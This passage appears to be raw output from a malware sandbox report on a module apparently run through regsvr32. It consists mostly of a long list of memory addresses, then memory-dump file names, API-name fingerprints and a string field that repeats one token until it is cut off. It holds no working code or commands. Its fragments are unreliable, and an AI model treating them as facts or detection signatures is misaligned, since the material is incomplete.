                                                                                        0x7fef7523bdb
                                                                                        0x7fef7523be5
                                                                                        0x7fef7523be8
                                                                                        0x7fef7523bf0
                                                                                        0x7fef7523bff
                                                                                        0x7fef7523c09
                                                                                        0x7fef7523c0c
                                                                                        0x7fef7523c14
                                                                                        0x7fef7523c23
                                                                                        0x7fef7523c2d
                                                                                        0x7fef7523c30
                                                                                        0x7fef7523c38
                                                                                        0x7fef7523c47
                                                                                        0x7fef7523c51
                                                                                        0x7fef7523c54
                                                                                        0x7fef7523c5c
                                                                                        0x7fef7523c6b
                                                                                        0x7fef7523c75
                                                                                        0x7fef7523c78
                                                                                        0x7fef7523c80
                                                                                        0x7fef7523c8f
                                                                                        0x7fef7523c99
                                                                                        0x7fef7523c9c
                                                                                        0x7fef7523ca4
                                                                                        0x7fef7523cb3
                                                                                        0x7fef7523cbd
                                                                                        0x7fef7523cc0
                                                                                        0x7fef7523cc8
                                                                                        0x7fef7523cd7
                                                                                        0x7fef7523ce1
                                                                                        0x7fef7523ce4
                                                                                        0x7fef7523cec
                                                                                        0x7fef7523cfb
                                                                                        0x7fef7523d05
                                                                                        0x7fef7523d08
                                                                                        0x7fef7523d10
                                                                                        0x7fef7523d1f
                                                                                        0x7fef7523d29
                                                                                        0x7fef7523d2c
                                                                                        0x7fef7523d34
                                                                                        0x7fef7523d43
                                                                                        0x7fef7523d4d
                                                                                        0x7fef7523d50
                                                                                        0x7fef7523d58
                                                                                        0x7fef7523d67
                                                                                        0x7fef7523d71
                                                                                        0x7fef7523d74
                                                                                        0x7fef7523d7c
                                                                                        0x7fef7523d8b
                                                                                        0x7fef7523d95
                                                                                        0x7fef7523d98
                                                                                        0x7fef7523da0
                                                                                        0x7fef7523daf
                                                                                        0x7fef7523db9
                                                                                        0x7fef7523dbc
                                                                                        0x7fef7523dc4
                                                                                        0x7fef7523dd3
                                                                                        0x7fef7523ddd
                                                                                        0x7fef7523de0
                                                                                        0x7fef7523de8
                                                                                        0x7fef7523df7
                                                                                        0x7fef7523e01
                                                                                        0x7fef7523e04
                                                                                        0x7fef7523e0c
                                                                                        0x7fef7523e1b
                                                                                        0x7fef7523e25
                                                                                        0x7fef7523e28
                                                                                        0x7fef7523e30
                                                                                        0x7fef7523e3f
                                                                                        0x7fef7523e49
                                                                                        0x7fef7523e4c
                                                                                        0x7fef7523e54
                                                                                        0x7fef7523e63
                                                                                        0x7fef7523e6d
                                                                                        0x7fef7523e70
                                                                                        0x7fef7523e78
                                                                                        0x7fef7523e87
                                                                                        0x7fef7523e91
                                                                                        0x7fef7523e94
                                                                                        0x7fef7523e9c
                                                                                        0x7fef7523eab
                                                                                        0x7fef7523eb5
                                                                                        0x7fef7523eb8
                                                                                        0x7fef7523ec0
                                                                                        0x7fef7523ecf
                                                                                        0x7fef7523ed9
                                                                                        0x7fef7523edc
                                                                                        0x7fef7523ee4
                                                                                        0x7fef7523ef3
                                                                                        0x7fef7523efd
                                                                                        0x7fef7523f00
                                                                                        0x7fef7523f08
                                                                                        0x7fef7523f17
                                                                                        0x7fef7523f21
                                                                                        0x7fef7523f24
                                                                                        0x7fef7523f2c
                                                                                        0x7fef7523f3b
                                                                                        0x7fef7523f45
                                                                                        0x7fef7523f48
                                                                                        0x7fef7523f50
                                                                                        0x7fef7523f5f
                                                                                        0x7fef7523f69
                                                                                        0x7fef7523f6c
                                                                                        0x7fef7523f74
                                                                                        0x7fef7523f83
                                                                                        0x7fef7523f8d
                                                                                        0x7fef7523f90
                                                                                        0x7fef7523f98
                                                                                        0x7fef7523fa7
                                                                                        0x7fef7523fb1
                                                                                        0x7fef7523fb4
                                                                                        0x7fef7523fbc
                                                                                        0x7fef7523fcb
                                                                                        0x7fef7523fd5
                                                                                        0x7fef7523fd8
                                                                                        0x7fef7523fe0
                                                                                        0x7fef7523fef
                                                                                        0x7fef7523ff9
                                                                                        0x7fef7523ffc
                                                                                        0x7fef7524004
                                                                                        0x7fef7524013
                                                                                        0x7fef752401d
                                                                                        0x7fef7524020
                                                                                        0x7fef7524028
                                                                                        0x7fef7524037
                                                                                        0x7fef7524041
                                                                                        0x7fef7524044
                                                                                        0x7fef752404c
                                                                                        0x7fef752405b
                                                                                        0x7fef7524065
                                                                                        0x7fef7524068
                                                                                        0x7fef7524070
                                                                                        0x7fef752407f
                                                                                        0x7fef7524089
                                                                                        0x7fef752408c
                                                                                        0x7fef7524094
                                                                                        0x7fef75240a3
                                                                                        0x7fef75240ad
                                                                                        0x7fef75240b0
                                                                                        0x7fef75240b8
                                                                                        0x7fef75240c7
                                                                                        0x7fef75240d1
                                                                                        0x7fef75240d4
                                                                                        0x7fef75240dc
                                                                                        0x7fef75240eb
                                                                                        0x7fef75240f5
                                                                                        0x7fef75240f8
                                                                                        0x7fef7524100
                                                                                        0x7fef752410f
                                                                                        0x7fef7524119
                                                                                        0x7fef752411c
                                                                                        0x7fef7524124
                                                                                        0x7fef7524133
                                                                                        0x7fef752413d
                                                                                        0x7fef7524140
                                                                                        0x7fef7524148
                                                                                        0x7fef7524157
                                                                                        0x7fef7524161
                                                                                        0x7fef7524164
                                                                                        0x7fef752416c
                                                                                        0x7fef752417b
                                                                                        0x7fef7524185
                                                                                        0x7fef7524188
                                                                                        0x7fef7524190
                                                                                        0x7fef752419f
                                                                                        0x7fef75241a9
                                                                                        0x7fef75241ac
                                                                                        0x7fef75241b4
                                                                                        0x7fef75241c3
                                                                                        0x7fef75241cd
                                                                                        0x7fef75241d0
                                                                                        0x7fef75241d8
                                                                                        0x7fef75241e7
                                                                                        0x7fef75241f1
                                                                                        0x7fef75241f4
                                                                                        0x7fef75241fc
                                                                                        0x7fef752420b
                                                                                        0x7fef7524215
                                                                                        0x7fef7524218
                                                                                        0x7fef7524220
                                                                                        0x7fef752422f
                                                                                        0x7fef7524239
                                                                                        0x7fef752423c
                                                                                        0x7fef7524244
                                                                                        0x7fef7524253
                                                                                        0x7fef752425d
                                                                                        0x7fef7524260
                                                                                        0x7fef7524268
                                                                                        0x7fef7524277
                                                                                        0x7fef7524281
                                                                                        0x7fef7524284
                                                                                        0x7fef752428c
                                                                                        0x7fef752429b
                                                                                        0x7fef75242a5
                                                                                        0x7fef75242a8
                                                                                        0x7fef75242b0
                                                                                        0x7fef75242bf
                                                                                        0x7fef75242c9
                                                                                        0x7fef75242cc
                                                                                        0x7fef75242d4
                                                                                        0x7fef75242e3
                                                                                        0x7fef75242ed
                                                                                        0x7fef75242f0
                                                                                        0x7fef75242f8
                                                                                        0x7fef7524307
                                                                                        0x7fef7524311
                                                                                        0x7fef7524314
                                                                                        0x7fef752431c
                                                                                        0x7fef752432b
                                                                                        0x7fef7524335
                                                                                        0x7fef7524338
                                                                                        0x7fef7524340
                                                                                        0x7fef752434f
                                                                                        0x7fef7524359
                                                                                        0x7fef752435c
                                                                                        0x7fef7524364
                                                                                        0x7fef7524373
                                                                                        0x7fef752437d
                                                                                        0x7fef7524380
                                                                                        0x7fef7524388
                                                                                        0x7fef7524397
                                                                                        0x7fef75243a1
                                                                                        0x7fef75243a4
                                                                                        0x7fef75243ac
                                                                                        0x7fef75243bb
                                                                                        0x7fef75243c5
                                                                                        0x7fef75243c8
                                                                                        0x7fef75243d0
                                                                                        0x7fef75243df
                                                                                        0x7fef75243e9
                                                                                        0x7fef75243ec
                                                                                        0x7fef75243f4
                                                                                        0x7fef7524403
                                                                                        0x7fef752440d
                                                                                        0x7fef7524410
                                                                                        0x7fef7524418
                                                                                        0x7fef7524427
                                                                                        0x7fef7524431
                                                                                        0x7fef7524434
                                                                                        0x7fef752443c
                                                                                        0x7fef752444b
                                                                                        0x7fef7524455
                                                                                        0x7fef7524458
                                                                                        0x7fef7524460
                                                                                        0x7fef752446f
                                                                                        0x7fef7524479
                                                                                        0x7fef752447c
                                                                                        0x7fef7524484
                                                                                        0x7fef7524493
                                                                                        0x7fef752449d
                                                                                        0x7fef75244a0
                                                                                        0x7fef75244a8
                                                                                        0x7fef75244b7
                                                                                        0x7fef75244c1
                                                                                        0x7fef75244c4
                                                                                        0x7fef75244cc
                                                                                        0x7fef75244db
                                                                                        0x7fef75244e5
                                                                                        0x7fef75244e8
                                                                                        0x7fef75244f0
                                                                                        0x7fef75244ff
                                                                                        0x7fef7524509
                                                                                        0x7fef752450c
                                                                                        0x7fef7524514
                                                                                        0x7fef7524523
                                                                                        0x7fef752452d
                                                                                        0x7fef7524530
                                                                                        0x7fef7524538
                                                                                        0x7fef7524547
                                                                                        0x7fef7524551
                                                                                        0x7fef7524554
                                                                                        0x7fef752455c
                                                                                        0x7fef752456b
                                                                                        0x7fef7524575
                                                                                        0x7fef7524578
                                                                                        0x7fef7524580
                                                                                        0x7fef752458f
                                                                                        0x7fef7524599
                                                                                        0x7fef752459c
                                                                                        0x7fef75245a4
                                                                                        0x7fef75245b3
                                                                                        0x7fef75245bd
                                                                                        0x7fef75245c0
                                                                                        0x7fef75245c8
                                                                                        0x7fef75245d7
                                                                                        0x7fef75245e1
                                                                                        0x7fef75245e4
                                                                                        0x7fef75245ec
                                                                                        0x7fef75245fb
                                                                                        0x7fef7524605
                                                                                        0x7fef7524608
                                                                                        0x7fef7524610
                                                                                        0x7fef752461f
                                                                                        0x7fef7524629
                                                                                        0x7fef752462c
                                                                                        0x7fef7524634
                                                                                        0x7fef7524643
                                                                                        0x7fef752464d
                                                                                        0x7fef7524650
                                                                                        0x7fef7524658
                                                                                        0x7fef7524667
                                                                                        0x7fef7524671
                                                                                        0x7fef7524674
                                                                                        0x7fef752467c
                                                                                        0x7fef752468b
                                                                                        0x7fef7524695
                                                                                        0x7fef7524698
                                                                                        0x7fef75246a0
                                                                                        0x7fef75246af
                                                                                        0x7fef75246b9
                                                                                        0x7fef75246bc
                                                                                        0x7fef75246c4
                                                                                        0x7fef75246d3
                                                                                        0x7fef75246dd
                                                                                        0x7fef75246e0
                                                                                        0x7fef75246e8
                                                                                        0x7fef75246f7
                                                                                        0x7fef7524701
                                                                                        0x7fef7524704
                                                                                        0x7fef752470c
                                                                                        0x7fef752471b
                                                                                        0x7fef7524725
                                                                                        0x7fef7524728
                                                                                        0x7fef7524730
                                                                                        0x7fef752473f
                                                                                        0x7fef7524749
                                                                                        0x7fef752474c
                                                                                        0x7fef7524754
                                                                                        0x7fef7524763
                                                                                        0x7fef752476d
                                                                                        0x7fef7524770
                                                                                        0x7fef7524778
                                                                                        0x7fef7524787
                                                                                        0x7fef7524791
                                                                                        0x7fef7524794
                                                                                        0x7fef752479c
                                                                                        0x7fef75247ab
                                                                                        0x7fef75247b5
                                                                                        0x7fef75247b8
                                                                                        0x7fef75247c0
                                                                                        0x7fef75247cf
                                                                                        0x7fef75247d9
                                                                                        0x7fef75247dc
                                                                                        0x7fef75247e4
                                                                                        0x7fef75247f3
                                                                                        0x7fef75247fd
                                                                                        0x7fef7524800
                                                                                        0x7fef7524808
                                                                                        0x7fef7524817
                                                                                        0x7fef7524821
                                                                                        0x7fef7524824
                                                                                        0x7fef752482c
                                                                                        0x7fef752483b
                                                                                        0x7fef7524845
                                                                                        0x7fef7524848
                                                                                        0x7fef7524850
                                                                                        0x7fef752485f
                                                                                        0x7fef7524869
                                                                                        0x7fef752486c
                                                                                        0x7fef7524874
                                                                                        0x7fef7524883
                                                                                        0x7fef752488d
                                                                                        0x7fef7524890
                                                                                        0x7fef7524898
                                                                                        0x7fef75248a7
                                                                                        0x7fef75248b1
                                                                                        0x7fef75248b4
                                                                                        0x7fef75248bc
                                                                                        0x7fef75248cb
                                                                                        0x7fef75248d5
                                                                                        0x7fef75248d8
                                                                                        0x7fef75248e0
                                                                                        0x7fef75248ef
                                                                                        0x7fef75248f9
                                                                                        0x7fef75248fc
                                                                                        0x7fef7524904
                                                                                        0x7fef7524913
                                                                                        0x7fef752491d
                                                                                        0x7fef7524920
                                                                                        0x7fef7524928
                                                                                        0x7fef7524937
                                                                                        0x7fef7524941
                                                                                        0x7fef7524944
                                                                                        0x7fef752494c
                                                                                        0x7fef752495b
                                                                                        0x7fef7524965
                                                                                        0x7fef7524968
                                                                                        0x7fef7524970
                                                                                        0x7fef752497f
                                                                                        0x7fef7524989
                                                                                        0x7fef752498c
                                                                                        0x7fef7524994
                                                                                        0x7fef75249a3
                                                                                        0x7fef75249ad
                                                                                        0x7fef75249b0
                                                                                        0x7fef75249b8
                                                                                        0x7fef75249c7
                                                                                        0x7fef75249d1
                                                                                        0x7fef75249d4
                                                                                        0x7fef75249dc
                                                                                        0x7fef75249eb
                                                                                        0x7fef75249f5
                                                                                        0x7fef75249f8
                                                                                        0x7fef7524a00
                                                                                        0x7fef7524a0f
                                                                                        0x7fef7524a19
                                                                                        0x7fef7524a1c
                                                                                        0x7fef7524a24
                                                                                        0x7fef7524a33
                                                                                        0x7fef7524a3d
                                                                                        0x7fef7524a40
                                                                                        0x7fef7524a48
                                                                                        0x7fef7524a57
                                                                                        0x7fef7524a61
                                                                                        0x7fef7524a64
                                                                                        0x7fef7524a6c
                                                                                        0x7fef7524a7b
                                                                                        0x7fef7524a85
                                                                                        0x7fef7524a88
                                                                                        0x7fef7524a90
                                                                                        0x7fef7524a9f
                                                                                        0x7fef7524aa9
                                                                                        0x7fef7524aac
                                                                                        0x7fef7524ab4
                                                                                        0x7fef7524ac3
                                                                                        0x7fef7524acd
                                                                                        0x7fef7524ad0
                                                                                        0x7fef7524ad8
                                                                                        0x7fef7524ae7
                                                                                        0x7fef7524af1
                                                                                        0x7fef7524af4
                                                                                        0x7fef7524afc
                                                                                        0x7fef7524b0b
                                                                                        0x7fef7524b15
                                                                                        0x7fef7524b18
                                                                                        0x7fef7524b20
                                                                                        0x7fef7524b2f
                                                                                        0x7fef7524b39
                                                                                        0x7fef7524b3c
                                                                                        0x7fef7524b44
                                                                                        0x7fef7524b53
                                                                                        0x7fef7524b5d
                                                                                        0x7fef7524b60
                                                                                        0x7fef7524b68
                                                                                        0x7fef7524b77
                                                                                        0x7fef7524b81
                                                                                        0x7fef7524b84
                                                                                        0x7fef7524b8c
                                                                                        0x7fef7524b9b
                                                                                        0x7fef7524ba5
                                                                                        0x7fef7524ba8
                                                                                        0x7fef7524bb0
                                                                                        0x7fef7524bbf
                                                                                        0x7fef7524bc9
                                                                                        0x7fef7524bcc
                                                                                        0x7fef7524bd4
                                                                                        0x7fef7524be3
                                                                                        0x7fef7524bed
                                                                                        0x7fef7524bf0
                                                                                        0x7fef7524bf8
                                                                                        0x7fef7524c07
                                                                                        0x7fef7524c11
                                                                                        0x7fef7524c14
                                                                                        0x7fef7524c1c
                                                                                        0x7fef7524c2b
                                                                                        0x7fef7524c35
                                                                                        0x7fef7524c38
                                                                                        0x7fef7524c40
                                                                                        0x7fef7524c4f
                                                                                        0x7fef7524c59
                                                                                        0x7fef7524c5c
                                                                                        0x7fef7524c64
                                                                                        0x7fef7524c73
                                                                                        0x7fef7524c7d
                                                                                        0x7fef7524c80
                                                                                        0x7fef7524c88
                                                                                        0x7fef7524c97
                                                                                        0x7fef7524ca1
                                                                                        0x7fef7524ca4
                                                                                        0x7fef7524cac
                                                                                        0x7fef7524cbb
                                                                                        0x7fef7524cc5
                                                                                        0x7fef7524cc8
                                                                                        0x7fef7524cd0
                                                                                        0x7fef7524cdf
                                                                                        0x7fef7524ce9
                                                                                        0x7fef7524cec
                                                                                        0x7fef7524cf4
                                                                                        0x7fef7524d03
                                                                                        0x7fef7524d0d
                                                                                        0x7fef7524d10
                                                                                        0x7fef7524d18
                                                                                        0x7fef7524d27
                                                                                        0x7fef7524d31
                                                                                        0x7fef7524d34
                                                                                        0x7fef7524d3c
                                                                                        0x7fef7524d4b
                                                                                        0x7fef7524d55
                                                                                        0x7fef7524d58
                                                                                        0x7fef7524d60
                                                                                        0x7fef7524d6f
                                                                                        0x7fef7524d79
                                                                                        0x7fef7524d7c
                                                                                        0x7fef7524d84
                                                                                        0x7fef7524d93
                                                                                        0x7fef7524d9d
                                                                                        0x7fef7524da0
                                                                                        0x7fef7524da8
                                                                                        0x7fef7524db7
                                                                                        0x7fef7524dc1
                                                                                        0x7fef7524dc4
                                                                                        0x7fef7524dcc
                                                                                        0x7fef7524ddb
                                                                                        0x7fef7524de5
                                                                                        0x7fef7524de8
                                                                                        0x7fef7524df0
                                                                                        0x7fef7524dff
                                                                                        0x7fef7524e09
                                                                                        0x7fef7524e0c
                                                                                        0x7fef7524e14
                                                                                        0x7fef7524e23
                                                                                        0x7fef7524e2d
                                                                                        0x7fef7524e30
                                                                                        0x7fef7524e38
                                                                                        0x7fef7524e47
                                                                                        0x7fef7524e51
                                                                                        0x7fef7524e54
                                                                                        0x7fef7524e5c
                                                                                        0x7fef7524e6b
                                                                                        0x7fef7524e75
                                                                                        0x7fef7524e78
                                                                                        0x7fef7524e80
                                                                                        0x7fef7524e8f
                                                                                        0x7fef7524e99
                                                                                        0x7fef7524e9c
                                                                                        0x7fef7524ea4
                                                                                        0x7fef7524eb3
                                                                                        0x7fef7524ebd
                                                                                        0x7fef7524ec0
                                                                                        0x7fef7524ec8
                                                                                        0x7fef7524ed7
                                                                                        0x7fef7524ee1
                                                                                        0x7fef7524ee4
                                                                                        0x7fef7524eec
                                                                                        0x7fef7524efb
                                                                                        0x7fef7524f05
                                                                                        0x7fef7524f08
                                                                                        0x7fef7524f10
                                                                                        0x7fef7524f1f
                                                                                        0x7fef7524f29
                                                                                        0x7fef7524f2c
                                                                                        0x7fef7524f34
                                                                                        0x7fef7524f43
                                                                                        0x7fef7524f4d
                                                                                        0x7fef7524f50
                                                                                        0x7fef7524f58
                                                                                        0x7fef7524f67
                                                                                        0x7fef7524f71
                                                                                        0x7fef7524f74
                                                                                        0x7fef7524f7c
                                                                                        0x7fef7524f8b
                                                                                        0x7fef7524f95
                                                                                        0x7fef7524f98
                                                                                        0x7fef7524fa0
                                                                                        0x7fef7524faf
                                                                                        0x7fef7524fb9
                                                                                        0x7fef7524fbc
                                                                                        0x7fef7524fc4
                                                                                        0x7fef7524fd3
                                                                                        0x7fef7524fdd
                                                                                        0x7fef7524fe0
                                                                                        0x7fef7524fe8
                                                                                        0x7fef7524ff7
                                                                                        0x7fef7525001
                                                                                        0x7fef7525004
                                                                                        0x7fef752500c
                                                                                        0x7fef752501b
                                                                                        0x7fef7525025
                                                                                        0x7fef7525028
                                                                                        0x7fef7525030
                                                                                        0x7fef752503f
                                                                                        0x7fef7525049
                                                                                        0x7fef752504c
                                                                                        0x7fef7525054
                                                                                        0x7fef7525063
                                                                                        0x7fef752506d
                                                                                        0x7fef7525070
                                                                                        0x7fef7525078
                                                                                        0x7fef7525087
                                                                                        0x7fef7525091
                                                                                        0x7fef7525094
                                                                                        0x7fef752509c
                                                                                        0x7fef75250ab
                                                                                        0x7fef75250b5
                                                                                        0x7fef75250b8
                                                                                        0x7fef75250c0
                                                                                        0x7fef75250cf
                                                                                        0x7fef75250d9
                                                                                        0x7fef75250dc
                                                                                        0x7fef75250e4
                                                                                        0x7fef75250f3
                                                                                        0x7fef75250fd
                                                                                        0x7fef7525100
                                                                                        0x7fef7525108
                                                                                        0x7fef7525117
                                                                                        0x7fef7525121
                                                                                        0x7fef7525124
                                                                                        0x7fef752512c
                                                                                        0x7fef752513b
                                                                                        0x7fef7525145
                                                                                        0x7fef7525148
                                                                                        0x7fef7525150
                                                                                        0x7fef752515f
                                                                                        0x7fef7525169
                                                                                        0x7fef752516c
                                                                                        0x7fef7525174
                                                                                        0x7fef7525183
                                                                                        0x7fef752518d
                                                                                        0x7fef7525190
                                                                                        0x7fef7525198
                                                                                        0x7fef75251a7
                                                                                        0x7fef75251b1
                                                                                        0x7fef75251b4
                                                                                        0x7fef75251bc
                                                                                        0x7fef75251cb
                                                                                        0x7fef75251d5
                                                                                        0x7fef75251d8
                                                                                        0x7fef75251e0
                                                                                        0x7fef75251ef
                                                                                        0x7fef75251f9
                                                                                        0x7fef75251fc
                                                                                        0x7fef7525204
                                                                                        0x7fef7525213
                                                                                        0x7fef752521d
                                                                                        0x7fef7525220
                                                                                        0x7fef7525228
                                                                                        0x7fef7525237
                                                                                        0x7fef7525241
                                                                                        0x7fef7525244
                                                                                        0x7fef752524c
                                                                                        0x7fef752525b
                                                                                        0x7fef7525265
                                                                                        0x7fef7525268
                                                                                        0x7fef7525270
                                                                                        0x7fef752527f
                                                                                        0x7fef7525289
                                                                                        0x7fef752528c
                                                                                        0x7fef7525294
                                                                                        0x7fef75252a3
                                                                                        0x7fef75252ad
                                                                                        0x7fef75252b0
                                                                                        0x7fef75252b8
                                                                                        0x7fef75252c7
                                                                                        0x7fef75252d1
                                                                                        0x7fef75252d4
                                                                                        0x7fef75252dc
                                                                                        0x7fef75252eb
                                                                                        0x7fef75252f5
                                                                                        0x7fef75252f8
                                                                                        0x7fef7525300
                                                                                        0x7fef752530f
                                                                                        0x7fef7525319
                                                                                        0x7fef752531c
                                                                                        0x7fef7525324
                                                                                        0x7fef7525333
                                                                                        0x7fef752533d
                                                                                        0x7fef7525340
                                                                                        0x7fef7525348
                                                                                        0x7fef7525357
                                                                                        0x7fef7525361
                                                                                        0x7fef7525364
                                                                                        0x7fef752536c
                                                                                        0x7fef752537b
                                                                                        0x7fef7525385
                                                                                        0x7fef7525388
                                                                                        0x7fef7525390
                                                                                        0x7fef752539f
                                                                                        0x7fef75253a9
                                                                                        0x7fef75253ac
                                                                                        0x7fef75253b4
                                                                                        0x7fef75253c3
                                                                                        0x7fef75253cd
                                                                                        0x7fef75253d0
                                                                                        0x7fef75253d8
                                                                                        0x7fef75253e7
                                                                                        0x7fef75253f1
                                                                                        0x7fef75253f4
                                                                                        0x7fef75253fc
                                                                                        0x7fef752540b
                                                                                        0x7fef7525415
                                                                                        0x7fef7525418
                                                                                        0x7fef7525420
                                                                                        0x7fef752542f
                                                                                        0x7fef7525439
                                                                                        0x7fef752543c
                                                                                        0x7fef7525444
                                                                                        0x7fef7525453
                                                                                        0x7fef752545d
                                                                                        0x7fef7525460
                                                                                        0x7fef7525468
                                                                                        0x7fef7525476
                                                                                        0x7fef752547f
                                                                                        0x7fef752548f
                                                                                        0x7fef7525495
                                                                                        0x7fef75254a2
                                                                                        0x7fef75254ab
                                                                                        0x7fef75254b4
                                                                                        0x7fef75254b9
                                                                                        0x7fef75254c7
                                                                                        0x7fef75254d3
                                                                                        0x7fef75254dc
                                                                                        0x7fef75254f3
                                                                                        0x7fef75254fa
                                                                                        0x7fef7525505
                                                                                        0x7fef7525510
                                                                                        0x7fef7525513
                                                                                        0x7fef7525520
                                                                                        0x7fef7525525

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.1264950335.000007FEF7521000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000007FEF7520000, based on PE: true
                                                                                        • Associated: 00000005.00000002.1264946903.000007FEF7520000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264960138.000007FEF7537000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264965991.000007FEF7540000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.1264982139.000007FEF7545000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_7fef7520000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$MessageWindow$AllocateFreeHeapIconStringTaskTranslate$AcceleratorAcceleratorsAllocClassCreateCursorDispatchExitLibraryProcessRegisterShowUpdateVirtual
                                                                                        • String ID: #r$4$#s]Y$$brB$$bxB$)5QH$,{P"$.:\3$3wa$5qN{$5vls$8QB$:EY$;-">$;;)P$=P'5$>'%\$>vBA$?P%5$AHCs$AU'l$AUf~$BwB$BwBAUf3EYRm7lBV3P)5Q$CAU#$CAU$DfO$H4Z'$Hb[3$LV=P$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM39n6mMSw3KbEg4$LntV4SWMfkM3